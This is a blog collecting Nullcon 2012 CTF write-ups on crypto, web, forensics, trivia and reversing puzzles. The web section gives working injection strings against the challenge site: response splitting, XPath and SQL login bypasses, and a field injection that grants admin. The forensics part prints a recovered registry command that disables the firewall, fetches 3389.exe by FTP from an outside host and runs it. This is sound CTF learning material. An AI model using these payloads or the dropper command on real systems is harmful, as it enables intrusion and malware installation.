Donnerstag, 19. Januar 2012

Nullcon 2012 CTF Programming Writeup

Level 1: ROTOMATA


Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit

Hint in the source: We only know the first 6 characters: "Men at"

Seems like that every byte is subtracted with the position.

But there was a still trick, the first 26 bytes have to be subtracted, the next 26 are added and so on.


Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in our stars, but in ourselves, that we are underlings


Level 2: Pascal's Triangle


The Flag is the sum of all middle terms till first 1337 rows of Pascal's Triangle
Hint in the source: ex: The sum of all middle terms till first 6 rows is 9

After googling i found a formula here.


sum = 0
if i == 0:
row = 1
last = 1
else:
row = i*2+1
last = last*(4*i - 2)/i

sum += last



Flag: 43659324741884237070936006832303643114239411987772786602066543431205872166674362332393596312576719064242547970040323267566530343333103970820072593578706234276624324605878186670972267056459871456566594569343564988621600326286475080697865518622537377534356455651048425097523734881838663157063304671110082383218294453737678744221560158357896856330703194356882895482874383651576271102847866170999680296497

Level 3: Your Brainfuck Sir ...


Debug bfcode to get the flag

File

The file is welformed, i just placed dbg outputs at the end of every line by placing ".".

And you get:
..In fact, never ever use gets() or sprintf(), period. If you do we willl send evil dwarfs after you.

You have to check the double output. like in "willl" and have to play with the dots at the beginning and end

Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs after you..

Level 4: Substitute Problem


File

Flag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green


Level 5: A pinch of salt for your coffee, Sir?


Link to the salted site

you can enter a password an you will get md5(password + salt) back

I entered the 1 and got 3b3afa7da0ccd2cd1d5a9733369d6eae back
throw it in an md5hash cracker and got back: 16541a8
The salt is: 6541a8




For corrections and other feedback send me an e-mail to bashrc at intruded dot net

Mittwoch, 18. Januar 2012

Nullcon CTF 2012 Crypto Writeup

Level 1


Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy qailki Oexjwok, 2 Ceaa Glyik

The web source contains a link to a mirror

Mirror all key by looking at your keyboard
q = p
a = l
z = m
. = ,
- = 2
3 = 0


WINDOWS 1999 ALREADY CONTAINS FEATURES SUCH AS THE HUMAN DISCIPLINE COMPONENT. WHERE THE PC CAN SEND AN ELECTRIC SHOCK THROUgH THE KEYBOARD IF THE HUMAN DOES SOMETHINg THAT DOES NOT PLEASE WINDOWS, 0 BILL gATES

Flag: Windows 2000 already contains features such as the human discipline component, where the PC can send an electric shock through the keyboard if the human does something that does not please Windows. - Bill Gates

Level2: White Noise


File contains only tabulators and spaces. Two bytes could be the code for binary?

using \t=0
4572726F72204D6573736167653A20596F75722050617373776F7264204D757374204265206174204C65617374203138373730204368617261637465727320616E642043616E6E6F742052657065617420416E79206F6620596F75722050726576696F75732033303638392050617373776F726473202D204D53204B4220323736333034
using \t = 1
BA8D8D908DDFB29A8C8C9E989AC5DFA6908A8DDFAF9E8C8C88908D9BDFB28A8C8BDFBD9ADF9E8BDFB39A9E8C8BDFCEC7C8C8CFDFBC979E8D9E9C8B9A8D8CDF9E919BDFBC9E9191908BDFAD9A8F9A9E8BDFBE9186DF9099DFA6908A8DDFAF8D9A8996908A8CDFCCCFC9C7C6DFAF9E8C8C88908D9B8CDFD2DFB2ACDFB4BDDFCDC8C9CCCFCB

The first one looks like printable ascii and decodes to the following, which is the flag.

Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of Your Previous 30689 Passwords - MS KB 276304

Level 3: The Base Test

Inside HTML Source will find this string:

====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ====

Looks like A-Z0-6 could be everthing above BASE31

RFC for Base encoding: http://tools.ietf.org/html/rfc4648
http://www.unitconversion.org/unit_converter/numbers-ex.html

http://tomeko.net/online_tools/base32.php?lang=en

Why does it have padding on both sides?
After reversing the string to
JVJDEVZWKZCFGTSGIRLUWVJTJJHFMUKXLFMUYT2NKJEEOTZSJRKU4RJ5HU6T2PJ5
and base32 decoding we get
MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======
after base32 decoding this, we get the flag
duoTriGeSimalandNgiti

Level 4: Elucidate

File
Obfuscated PHP file with 3 stages.

1. Stage was evaling a base64 decoded php script.
2. Stage had a if check that executed the following code

gzinflate(
base64_decode( str_rot13("yIIgnkcORC4eT5SRD0cho3s2WqMVXWozH4hRSSXY7B0YBDtdngd0cs+9f96rZnyjS/jj7hmZZ8+87M2sTxT1NWZoRJljzDMMXNUXppQ/rLQG89Uy+9UlsxyVrWmoGozLR7ilMhAai8gyemgw0aVKsNMFMeoj3UOjhsR6TP2Z4WVZvIzgmX9r/6j7l6mw1agjlawTPb9kZk08qlP08gXt8pxW2txJNVWt1uyqrZoOHyAjLA4Xd6lanOsZj9e3lE9Fuy4bU/mZC5KemoeKUXECwb/WHKBDPY7lz8sIiNb2VU9Wq+MfSvwmzzxnphJxlvz3XtCOsSRLmc/mUHEd5KcJUMfe1L8OjjXYn+/oSAnfxD7jKTxVNLWEmuLDzZL7omK1VavnU6kDb1C0nx7123qZguxg1v3+xVMqCZ43iJoxENOxGzaOAA5zDFxXwzMZOthn+4XYQZCC/H9lIl6iIin+/BSG0Mf9310hya7rLywnQBBV3S1/hMc8+UE9B764+Uj7aalqKA+ZlpHY/LsW+Bcz3PqUjlUMeO79bsS67a7wzYKhscgvTBp+4bF0TV2mSxTeEJzBnu8J623YhwZrQTZf94R5de1JCTAXpfLY5KVyIrk0M/bxjcFPDTzaISXHrMXb5/a0FGXHtOY1VgecMP/kmSRdCAAxk/ojrAVaJrfy+bSRPFu5MIsw1UT2RiRRIYmvsGkUC+Fj8ks5Uu76Nni47+ARaclzp4jQFIY0MkIrUFslxscIUvmcVqaeINrbpVI/unqFCWUlwirlfd9krZYM+r3k2gLeF/nv4uUmSP7Sf8/8EA0KyhkGsI7HZ/fsQ2QiGQhQ3p687p2CZ+yklj4fKEmJcfq2JQ3vaqGGBwsxkhu0F81tXcT67WlED2M5BmZ2eDq2dkLqMC6z720S66eSxPLAAunJ1jgEAKN737geMYA9xjMxqCxC"))


3. Stage had zip routine but it was not nessesary to decrypt.

var1=array( "file1.jpg", "file2.jpg", "file3.gif");
create_zip( var1, "myzipfile.zip", true);


The flag was in an unused variable

$_4fa3332ef3d19e9840387434b8d28780 = "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61";


Flag: onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena

Level 5: Llun Saving Bank


Llun Saving Bank is fed up with known encryption standards to store the data. They decided to reinvent the wheel. Can you decode the data?

Inside the HTML Source you will find:

Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd



After decrypting it, you will get this text
"Is God willing to prevent Evil but not Able? Then he is NOT Omnipotent. Is He Able, but NOT willing? Then He is Malevolent. Is He Both Able and Willing? Then Whence Cometh Evil? Is he Neither Able Nor Willing? Then WHY call him GOD? - Epicurusongod"


If you diff the characters you will get that the bytes only differ with at most one value (+1/0/-1).

Seems like that the last bit matters. So print out the last bit of every character of the crypted text.
01001100011001010110000101110010011011100010000001101000011011110111011101110100011011110010000001001000011010010110010001100101001000000110100101101110001000000101000001101100011000010110100101101110001000000101001101101001011001110110100001110100

This decodes to the Flag: "Learn howto Hide in Plain Sight"


For corrections and other feedback send me an e-mail to bashrc at intruded dot net

Nullcon Ctf 2012 Web Writeup

Level 1


adding a will trigger a 503 error

The server just emulated the bug, so you had to guess the right solution string.

Solution:
/challenge/wlevel-1-proc.asp?input=password.asptest.txt

Level 2


Can you redirect ME to hackim.null.co.in?

First idea was trying http response splitting, but you won't get real feedback. I guess it's emulated again. At the end the following request did it.

GET /challenge/wlevel-2-proc.asp?page=%0d%0a%0aHTTP/1.1%20302%20Moved%20Temporarily%0d%0aLocation:%20http://hackim.null.co.in/

Level 3


Login System

Click here to Login
Click here to Register
Invalid Flag. Please try again.



Registration using
username=Admin125&name=admin&password=admin&email=admin%40somemail.com&Submit=Register
and we get
Debug Info: INSERT 'Admin125|admin|admin|admin@somemail.com|admin:no|comment:new user' INTO USER DB FILE

changing to:
username=Admin126&name=admin&password=admin&email=admin%40somemail.com|admin:yes&Submit=Register

Login as Admin126 and you get

Welcome! You are logged in as ADMIN!
Flag: b3149ecea4628efd23d2f86e5a723472


Level 4

Can You Get Me all the Data?

2007
2002

Check for XPATH injection
/challenge/wlevel-4-data.asp?input='%20or%20''='
We get 11 presidents of india

trying flag as node name and identify lenght of the flag
/challenge/wlevel-4-data.asp?input='%20orstring-length(//flag)=11%20and%20''='

bruteforce using
/challenge/wlevel-4-data.asp?input='%20or%20substring(//flag,1,1)='W'%20and%20''='

We get "Web+Level+4", but this is not the solution.

So trying to get all data.
Doing some experiments and get the count of all entries.
/challenge/wlevel-4-data.asp?input=2002'%20and%20count(/*[1]/*[1]/*)=12%20and%20''='

11 presidents but 12 nodes?

Either you guess the node name or you bruteforce the server with blind XPATH attacks like me.

After searching for the node //value

Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear


Afterwards i got non blind solutions from others

1: '] //* | //* ['1' ='1
2: 2002']/parent::node()[position()='1

Web Level 5


Do You Have What IT Takes to Break into the World's Most Secure Login System?

SQL injection with recaptcha?

If you insert ' OR ''=' you will be detected, so no spaces are allowed.

You can try '=' which should build a query like "where username=''=''" and this will be true.

In our case inserting '!=' or '<>' in username and password will pass the test.

username = '' != '' and password = '' != ''

Why is this working? The query is executed here from left to right.
username = '' is FALSE
FALSE != '' is TRUE

For SQLite: "Arithmetic, boolean, relational and bitwise operators are all left to right associated."

Flag: 47c1b025fa18ea96c33fbb6718688c0f




For corrections and other feedback send me an e-mail to bashrc at intruded dot net

Nullcon CTF 2012 Forensic Writeup

Forensics Level 1: Tum Agar Dhyan Se Baat Meri Suno

While conducting the raid on a suspect the police found the system containing no suspicious information in the form of a code. While comparing various files they came up with a suspicious sound file and feel that the code is hidden inside the same.
You are asked to find out that code if hidden in the file.

File: JS.rar

song name

If you listen to you will notice, there are some silent voices. I opened it in Audacity and looked for silentparts, removed everything else and played it again. It was sounding like a reversed voice. So i reversed the whole audio using Audacity and listened to some numbers, which is the flag

Flag: 12344346765

Forensics Level 2: Andar Ch0r

A company Mil Baat Ke Khao Ltd suspects that one of its employees is sending the internal codes secretly outside the organisation. The company sniffed the data being sent and reconstructed it to find that a word document was being sent.
The company strongly suspects that there is some hidden passport code in the document.
You as a forensic investigator are provided with the copy of that file and are required to find out the hidden code. The code has to be in whole number.

A word file was given with an image containing this string:
446f20796f75207265616c6c79206665656c207468617420746865206172636869746563742069320736f2064756d623f

Which is ascii encoded for "Do you really feel that the architect is so dumb?"

If you run strings on it you will see some information
Here is your Passport number to the new level
Hey Good Job doneK
I wonder if you need to fire up your brain even more to reach the new level
May be yes
May be no


Seems like there is something else inside
running foremost on it
0:      00000000.ole          41 KB               0
1: 00000019.zip 18 KB 10130

$ unzip 00000019.zip
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: theme/theme/themeManager.xml
inflating: theme/theme/theme1.xml
inflating: theme/theme/_rels/themeManager.xml.rels

nothing intereseting inside

opening the ole in XLS:
"Well done………… I guess you are on the correct path…….. Carry on"

After clicking on Format->Sheet->Unhide you can unhide the Nullcon2 sheet.
Hey Good Job done
I wonder if you need to fire up your brain even more to reach the new level
May be yes
May be no
I guess ………………………. What do I Say ;)


But this is not enough, what i have now done is. Saving the file in the xlsx format. Unziping it and looking into xml files.
opening xl/workbook.xml changing
sheet name="Nullcon3" sheetid="3" state="veryHidden" id="rId3"
to
sheet name="Nullcon3" sheetid="3" state="hidden" id="rId3"

saving it and compressing to a new xlsx file.

$ zip -r myzip.xlsx *
adding: [Content_Types].xml (deflated 77%)
adding: _rels/ (stored 0%)
adding: _rels/.rels (deflated 60%)
adding: docProps/ (stored 0%)
adding: docProps/app.xml (deflated 53%)
adding: docProps/core.xml (deflated 49%)
adding: xl/ (stored 0%)
adding: xl/_rels/ (stored 0%)
adding: xl/_rels/workbook.xml.rels (deflated 76%)
adding: xl/calcChain.xml (deflated 16%)
adding: xl/sharedStrings.xml (deflated 43%)
adding: xl/styles.xml (deflated 55%)
adding: xl/theme/ (stored 0%)
adding: xl/theme/theme1.xml (deflated 80%)
adding: xl/workbook.xml (deflated 45%)
adding: xl/worksheets/ (stored 0%)
adding: xl/worksheets/sheet1.xml (deflated 46%)
adding: xl/worksheets/sheet2.xml (deflated 53%)
adding: xl/worksheets/sheet3.xml (deflated 61%)


Open it and unhide nullcon3 and you see the calculated value:
6924288.652

Keep attention, that you have to use "." seperator, it won't accept it with a ",".

Actually there was a faster way. Open the document in Excel, pres ALT+F11 and you get the VBA Project Listing. Select Sheet3 and press F6 and you get the Properties and chang the visibility to visible :) Thx to king_aurther for pointing to this.


Forensics Level 3: Not Guilty!

An employee was suspected of using some malicious files. The employee asserts that he is not guilty cause he never used any program except microsoft word and excel.
While conducting the analysis nothing was found in the registry suggesting that something did run automatically. All locations that can run program automatically were examined and nothing malicious was found.
You as an investigator are provided with a piece of hive to carve out if anything was deleted from the hive and provide the exact "Value", "value type" and "data" deleted so that the employee gets the justice.

There are many tool at The Forensic Wiki.
$ reglookup-timeline software > timeline.txt
$ cat timeline.txt | awk '{print $1}' | sort | uniq
2007-08-09
2007-08-10
MTIME,FILE,PATH
$

$ reglookup-recover software
OFFSET,REC_LENGTH,REC_TYPE,PATH,NAME,NK_MTIME,NK_NVAL,VK_TYPE,VK_VALUE,VK_DATA_LEN,SK_OWNER,SK_GROUP,SK_SACL,SK_DACL,RAW_CELL
ERROR: Bad cell length encountered while parsing unallocated cells at offset 0x00A27908.
00B4EEA0,00000020,VALUE,,Shell,,,SZ,c:\x5Cwindows\x5Csystem32\x5Ccmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q,490,,,,,


Value: Shell
Type: REG_SZ
Data: c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q


Forensics Level 4: Intriguing MBR


A suspected drive was found in bad shape. The data extraction was almost impossible and the final copy obtained carried only few bytes. The bytes belonged to the initial sectors and wherever the system could not read the space was filled with 0x00 so as to keep the offset of the data obtained intact.
The initial sector displayed a messy MBR data.
As a forensic investigator you are required to find the following information:
1) The number of partitions in the damaged drives
2) The start and end LBA for each partition
3) The Start and end of unpartitioned space between two clusters

The Drive showed to be a SATA drive with 512 bytes of LBA

File



But the numbers are wrong, i dived the value to 512 to get the LBA, but actually the values inside were already the LBA values, so changed it to
slba1=2048&elba1=98566144&ptype1=5&slba2=98568192&elba2=182454271&ptype2=12&slba3=182454272&elba3=203425791&ptype3=14&slba4=203425792&elba4=253757439&ptype4=23&slba5=253757440&elba5=310380543&ptype5=47&slba6=310380544&elba6=352323583&ptype6=48&slba7=352323584&elba7=406849535&ptype7=15&slba8=406849536&elba8=488397134&ptype8=5&slba9=98566145&elba9=98568191&ptype9=5&slba10=&elba10=&ptype10=0&slba11=&elba11=&ptype11=0&slba12=&elba12=&ptype12=0&slba13=&elba13=&ptype13=0&slba14=&elba14=&ptype14=0&slba15=&elba15=&ptype15=0&slba16=&elba16=&ptype16=0&slba17=&elba17=&ptype17=0&slba18=&elba18=&ptype18=0&slba19=&elba19=&ptype19=0&slba20=&elba20=&ptype20=0&Submit=Submit

I got a hint telling me the order matters, so the final solution was this post request.
slba1=2048&elba1=98566144&ptype1=5&slba3=98568192&elba3=182454271&ptype3=12&slba4=182454272&elba4=203425791&ptype4=14&slba5=203425792&elba5=253757439&ptype5=23&slba6=253757440&elba6=310380543&ptype6=47&slba7=310380544&elba7=352323583&ptype7=48&slba8=352323584&elba8=406849535&ptype8=15&slba9=406849536&elba9=488397134&ptype9=5&slba2=98566145&elba2=98568191&ptype2=5&slba10=&elba10=&ptype10=0&slba11=&elba11=&ptype11=0&slba12=&elba12=&ptype12=0&slba13=&elba13=&ptype13=0&slba14=&elba14=&ptype14=0&slba15=&elba15=&ptype15=0&slba16=&elba16=&ptype16=0&slba17=&elba17=&ptype17=0&slba18=&elba18=&ptype18=0&slba19=&elba19=&ptype19=0&slba20=&elba20=&ptype20=0&Submit=Submit

Forensics Level 5: Universal Swindlers Bayonet


Anusandhaanic Daakus Ltd. Is a company whose strength lies in the researches it conducts. Very often the employees leaving the organisation manage to carry the research data alongwith. This time company decided to go for the investigation and called upon a forensic investigator. This investigator captured the memory dump and shut the system down. On resuming the system he finds that the drive has been encrypted and is left with only the memory dump.
You as an investigator are required to find out the following information from the dump 1) Serial No. of external drive
2) Date and time (IST) when the drive was first connected
3)Date and time (IST) when the drive was last connected
4) Launching which other executable (Not nullcon.exe>) resulted in launching of nullcon.exe

File


https://www.volatilesystems.com/default/volatility
http://code.google.com/p/volatility/wiki/CommandReference

After playing Codegate, i already knew, that the storage information is stored in the registry, so we have to look for the registry entries.
http://www.forensicswiki.org/wiki/USB_History_Viewing

Check mounted devices first
Look for SYSTEM/MountedDevices
$ vol.py -f null.img printkey -K "MountedDevices"

REG_BINARY \??\Volume{f57881e4-37ca-11e1-8cf1-806d6172696f} : (S) CDROM
REG_BINARY \??\Volume{f57881e6-37ca-11e1-8cf1-806d6172696f} : (S)
REG_BINARY \DosDevices\D: : (S)
REG_BINARY \DosDevices\E: : (S) CDROM
REG_BINARY \??\Volume{f57881e8-37ca-11e1-8cf1-806d6172696f} : (S)
REG_BINARY \DosDevices\C: : (S)
REG_BINARY \??\Volume{9f9f94da-37a0-11e1-a8b1-001bb988bbdb} : (S)
REG_BINARY \DosDevices\F: : (S)


0xe101bad8 is the address for system from the hivelist
$ vol.py -f null.img hivedump -o 0xe101bad8 | grep -i usbstor
2012-01-05 13:24:36 \$PROTO.HIV\ControlSet001\Enum\USBSTOR
2012-01-05 13:24:36 \$PROTO.HIV\ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142
2012-01-06 12:22:13 \$PROTO.HIV\ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142\2GEL32TN&0
2012-01-05 13:24:39 \$PROTO.HIV\ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142\2GEL32TN&0\Device Parameters
2012-01-05 13:24:36 \$PROTO.HIV\ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142\2GEL32TN&0\LogConf


$ vol.py -f null.img printkey -K "ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142"

Last updated: 2012-01-05 13:24:36
Converted to IST: 2012-01-05 18:54:36

$ vol.py -f null.img printkey -K "ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142\2GEL32TN&0"

Last updated: 2012-01-06 12:22:13
Converted to IST: 2012-01-06 17:52:13

Subkeys:
(S) Device Parameters
(S) LogConf

Values:
REG_SZ DeviceDesc : (S) Disk drive
REG_DWORD Capabilities : (S) 16
REG_DWORD UINumber : (S) 0
REG_MULTI_SZ HardwareID : (S) ['USBSTOR\\DiskSeagate_FreeAgent_Go____0142', 'USBSTOR\\DiskSeagate_FreeAgent_Go____', 'USBSTOR\\DiskSeagate_', 'USBSTOR\\Seagate_FreeAgent_Go____0', 'Seagate_FreeAgent_Go____0', 'USBSTOR\\GenDisk', 'GenDisk', '', '']
REG_MULTI_SZ CompatibleIDs : (S) ['USBSTOR\\Disk', 'USBSTOR\\RAW', '', '']
REG_SZ ClassGUID : (S) {4D36E967-E325-11CE-BFC1-08002BE10318}
REG_SZ Service : (S) disk
REG_DWORD ConfigFlags : (S) 0
REG_SZ Driver : (S) {4D36E967-E325-11CE-BFC1-08002BE10318}\0001
REG_SZ Class : (S) DiskDrive
REG_SZ Mfg : (S) (Standard disk drives)
REG_SZ FriendlyName : (S) Seagate FreeAgent Go USB Device



Now the process part
$ vol.py -f null.img pstree
Volatile Systems Volatility Framework 2.0
Name Pid PPid Thds Hnds Time
0x821C6A00:System 4 0 59 240 1970-01-01 00:00:00
. 0x81F5FB10:smss.exe 580 4 3 21 2012-01-06 12:39:37
.. 0x81FF92A0:csrss.exe 644 580 11 349 2012-01-06 12:39:38
.. 0x81FF8DA0:winlogon.exe 668 580 20 503 2012-01-06 12:39:38
... 0x81FE35D0:services.exe 712 668 15 258 2012-01-06 12:39:38
.... 0x81F84210:svchost.exe 1056 712 72 1193 2012-01-06 12:39:39
.... 0x81FE8620:svchost.exe 1212 712 14 204 2012-01-06 12:39:39
.... 0x81B73020:alg.exe 516 712 7 103 2012-01-06 12:39:49
.... 0x82018438:svchost.exe 968 712 10 227 2012-01-06 12:39:39
.... 0x82002530:svchost.exe 1176 712 5 58 2012-01-06 12:39:39
.... 0x81FA8AC0:svchost.exe 900 712 20 201 2012-01-06 12:39:38
.... 0x81F586F0:spoolsv.exe 1336 712 13 122 2012-01-06 12:39:39
... 0x81FEEBB8:lsass.exe 724 668 26 343 2012-01-06 12:39:38
0x81F7A428:explorer.exe 1584 1568 13 374 2012-01-06 12:39:40
. 0x81B941E0:nullcon.exe 484 1584 1 22 2012-01-06 12:40:07
.. 0x81BA3020:cmd.exe 320 484 1 28 2012-01-06 12:40:20
. 0x81B403A8:cmd.exe 1048 1584 1 31 2012-01-06 12:40:13
.. 0x81B7B020:win32dd.exe 856 1048 1 21 2012-01-06 12:40:30

We see explorer.exe started nullcon.exe

Seems like that explorer.exe is not the required file.

http://www.mandiant.com/products/free_software/memoryze/download
http://www.mandiant.com/products/free_software/mandiant_audit_viewer/download

We see nullcon is started with the parameter C:\WINDOWS\system32\mshearts.exe

and it is calling
C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\user\LOCALS~1\Temp\ztmp\tmp71989.bat C:\WINDOWS\system32\mshearts.exe

Format Expected: "DD/MM/YYYY HH:MM:SS" from the source

SerialNo.: 2GEL32TN
First mounted: 05/01/2012 18:54:36
Last mounted: 06/01/2012 17:52:13
Launched by: mshearts.exe






For corrections and other feedback send me an e-mail to bashrc at intruded dot net

Nullcon CTF 2012 Trivia Writeup

Trivia 100



First thought was Nucleus, it is related to TRON (1982) and it is a puzzle game.

But following the What_Evil_Lurks hint it was at the end at the cover.

Flag: Android

Trivia 200



This fictional IPv4 packet header field was proposed in RFC 3514 as a means for identifying packets with malicious intent.

http://www.ietf.org/rfc/rfc3514.txt

The bit field is laid out as follows:

0
+-+
|E|
+-+


Flag: e

Trivia 300



This humorous RFC of the Internet Engineering Task Force describes a communication and control protocol suite designed for allowing infinite numbers of monkeys with infinite numbers of typewriters to produce the entire works of William Shakespeare.


Google: RFC infinite numbers of monkeys with infinite numbers of typewriters to produce the entire works of William Shakespeare

http://www.ietf.org/rfc/rfc2795.txt

Flag: 2795

Trivia 400

Metasploit was originally coded for what purpose?

This was pretty hard to identify. After googling pretty long you will many information about metasploit but this one has the solution inside.

https://www.blackhat.com/presentations/bh-dc-10/Moore_HD/BlackHat-DC-2010-Moore-Metasploit-and-Money-wp.pdf

"Since I was doing this for fun anyways, I decided to make a game out of it, the target network would become the "map", the "weapons" were the exploits, and points were scored when the player's specific agent was installed on the target systems."

The Answer is game

Trivia 500


Released on April 1st 2003, this esoteric programming language uses spaces, tabs and linefeeds to compose commands.

Flag: whitespace


For corrections and other feedback send me an e-mail to bashrc at intruded dot net

Getting the address of next instruction using INT 2E

During some reversing process at the nullcon CTF i recognized, that an INT 2E call is loading the address of the next instructions into the EDX Register.


Address Hex dump Command
0040103E |. 33C0 XOR EAX,EAX
00401040 |. 33D2 XOR EDX,EDX
00401042 |. 68 A141761D PUSH 1D7641A1
00401047 |. 68 BEBAADDE PUSH DEADBABE
0040104C |. 6A 00 PUSH 0
0040104E |. 6A 00 PUSH 0
00401050 |. 6A 00 PUSH 0
00401052 |. 6A 00 PUSH 0
00401054 |. 6A 00 PUSH 0
00401056 |. 6A 00 PUSH 0
00401058 |. 6A 00 PUSH 0
0040105A |. 6A 00 PUSH 0
0040105C |. 6A 00 PUSH 0
0040105E |. CD 2E INT 2E
00401060 |. 83C2 1A ADD EDX,1A
00401063 |. FFD2 CALL EDX


After calling INT 2E at 0040105E, EDX will contain the address of the next instruction (00401060). The return value contains 0xC0000005, which means an access violation has occurred.

Registers at 00401063:
EAX C0000005
ECX 0012FEDC
EDX 0040107A HackIM.0040107A
EBX 00000001
ESP 0012FEDC
EBP 0012FF30
ESI 00000000
EDI FFFFFFFE
EIP 00401063 HackIM.00401063

The INT 2E Instruction is a call to KiSystemService, where EAX is containing the service number and EDX a pointer. The value in EAX will be lookedup in the KiServiceTable (Wiki Entry for SSDT). I found a KiServiceTable Dump at some forum here
In our Case EAX is 0 and it is calling NtAcceptConnectPort.

For completeness here are the registers before calling the INT 2E instruction and the stack before and after the call.
EAX 00000000
ECX 0000000A
EDX 00000000
EBX 00000001
ESP 0012FEDC
EBP 0012FF30
ESI 00000000
EDI FFFFFFFE
EIP 0040105E HackIM.0040105E
0012FEDC /00000000
0012FEE0 |00000000
0012FEE4 |00000000
0012FEE8 |00000000
0012FEEC |00000000
0012FEF0 |00000000
0012FEF4 |00000000
0012FEF8 |00000000
0012FEFC |00000000
0012FF00 |DEADBABE
0012FF04 |1D7641A1

Nullcon CTF 2012 Reverse Engineering Writeup

Reversing 1 justdoit.exe

The file is packed. There are no AntiDBG Protections so you can run it in OllyDBG.

If you start the application, it will send KeyPressed calls to press the WIN Button and arrow up to click on run and enter wplayer.exe to start windows media player. Later it will type the flag.

By Setting a Breakpoint to 0x004040A5 you will see the routine for calling this function.

Flag: We could talk all day about what AutoHotKey can do for an online poker player

Reversing 2

It was like a redherring with the binary. Sometime later, there was a hint to the .rsrc section.

Then i just executed code in the .rsrc section. It had 5 decryption routines, which you can see in the screenshot. After the last decrpytion EAX was pointing to the flag.



Flag: AreYouHappyNow?

Level 3: null Mobile Android App


We're proud to announce the null Mobile Android App Project, however the application is currently in Beta Phase and requires lot of attention from the testers.
In keeping with the spirit of HackIM we've hidden a Flag inside. Your task is to find the Flag

extract the file and look into the files.
res/raw/code.js is a redherring.

view res/raw/junk.php there is a javascript inside.

Analyse/unpack this javascript and you will see, that there is a hidden function, which holds the key.

   function mikcah(a, b) {
galf = "Do not let what you cannot do interfere with what you can do.";
}


Flag: Do not let what you cannot do interfere with what you can do.

Level 4

$ file script2
script2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, stripped
$ objdump -R script2

script2: file format elf64-x86-64

DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0000000000601fe0 R_X86_64_GLOB_DAT __gmon_start__
0000000000602ee0 R_X86_64_COPY __environ
0000000000602ee8 R_X86_64_COPY stderr
0000000000602000 R_X86_64_JUMP_SLOT getenv
0000000000602008 R_X86_64_JUMP_SLOT __errno_location
0000000000602010 R_X86_64_JUMP_SLOT getpid
0000000000602018 R_X86_64_JUMP_SLOT __stack_chk_fail
0000000000602020 R_X86_64_JUMP_SLOT __libc_start_main
0000000000602028 R_X86_64_JUMP_SLOT memcmp
0000000000602030 R_X86_64_JUMP_SLOT calloc
0000000000602038 R_X86_64_JUMP_SLOT putenv
0000000000602040 R_X86_64_JUMP_SLOT atoll
0000000000602048 R_X86_64_JUMP_SLOT fprintf
0000000000602050 R_X86_64_JUMP_SLOT time
0000000000602058 R_X86_64_JUMP_SLOT __xstat
0000000000602060 R_X86_64_JUMP_SLOT malloc
0000000000602068 R_X86_64_JUMP_SLOT __isoc99_sscanf
0000000000602070 R_X86_64_JUMP_SLOT execvp
0000000000602078 R_X86_64_JUMP_SLOT sprintf
0000000000602080 R_X86_64_JUMP_SLOT strdup
0000000000602088 R_X86_64_JUMP_SLOT strerror
$ ltrace ./script2
__libc_start_main(0x40147d, 1, 0x7fff1c8bd988, 0x401540, 0x4015d0
atoll(0x6020c0, 11, 0, 92, 0x7fdc0795f300) = 0x4f0f26a8
time(NULL) = 1327077060
__errno_location() = 0x7fdc07b626a8
